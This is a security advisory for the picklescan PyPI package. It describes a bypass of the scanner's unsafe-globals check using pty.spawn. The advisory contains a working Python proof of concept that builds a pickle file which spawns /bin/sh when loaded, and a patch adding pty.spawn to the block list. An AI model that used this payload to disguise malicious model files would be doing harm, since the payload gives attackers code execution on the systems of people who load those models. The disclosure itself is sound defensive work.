GHSA-hgrh-qx5j-jfwx

Suggest an improvement
Source
https://github.com/advisories/GHSA-hgrh-qx5j-jfwx
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/12/GHSA-hgrh-qx5j-jfwx/GHSA-hgrh-qx5j-jfwx.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-hgrh-qx5j-jfwx
Published
2025-12-29T15:26:37Z
Modified
2025-12-29T16:00:08.561665Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
Picklescan Bypasses Unsafe Globals Check using pty.spawn
Details

Summary

The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the pty library (more specifically, of the pty.spawn function) from PickleScan's list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.

Details

For 2025's HeroCTF, there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and Fickling to gain code execution. The challenge writeup, files and solve script have all been released.

The intended way was to use pty.spawn but some players found alternative solutions.

PoC

  • Run the following Python code to generate the PoC pickle file.

    import pickle
    
    command = b"/bin/sh"
    
    payload = b"".join(
        [
            pickle.PROTO + pickle.pack("B", 4),
            pickle.MARK,
            pickle.GLOBAL + b"pty\n" + b"spawn\n",
            pickle.EMPTY_LIST,
            pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command,
            pickle.APPEND,
            # Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes
            pickle.OBJ,
            pickle.STOP,
        ]
    )
    
    with open("dump.pkl", "wb") as f:
        f.write(payload)
    
  • Run PickleScan on the generated pickle file. <img width="936" height="311" alt="picklescan_bypass_pty_spawn" src="https://github.com/user-attachments/assets/0d6430e4-a7e5-461c-9d75-c607f6886c9f" />

PickleScan detects the pty.spawn global as "suspicious" but not "dangerous", allowing it to be loaded.

Impact

Severity: High Affected Users: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content. Impact Details: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the pty.spawn function. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded.

Suggested Patch

diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py
index 34a5715..b434069 100644
--- a/src/picklescan/scanner.py
+++ b/src/picklescan/scanner.py
@@ -150,6 +150,7 @@ _unsafe_globals = {
     "_pickle": "*",
     "pip": "*",
     "profile": {"Profile.run", "Profile.runctx"},
+    "pty": "spawn",
     "pydoc": "pipepager",  # pydoc.pipepager('help','echo pwned')
     "timeit": "*",
     "torch._dynamo.guards": {"GuardBuilder.get"},
Database specific
{
    "severity": "HIGH",
    "github_reviewed_at": "2025-12-29T15:26:37Z",
    "cwe_ids": [
        "CWE-693"
    ],
    "nvd_published_at": null,
    "github_reviewed": true
}
References

Affected packages

PyPI / picklescan

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.0.33

Affected versions

0.*

0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.0.9
0.0.10
0.0.11
0.0.12
0.0.13
0.0.14
0.0.15
0.0.16
0.0.17
0.0.18
0.0.19
0.0.20
0.0.21
0.0.22
0.0.23
0.0.24
0.0.25
0.0.26
0.0.27
0.0.28
0.0.29
0.0.30
0.0.31
0.0.32

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/12/GHSA-hgrh-qx5j-jfwx/GHSA-hgrh-qx5j-jfwx.json"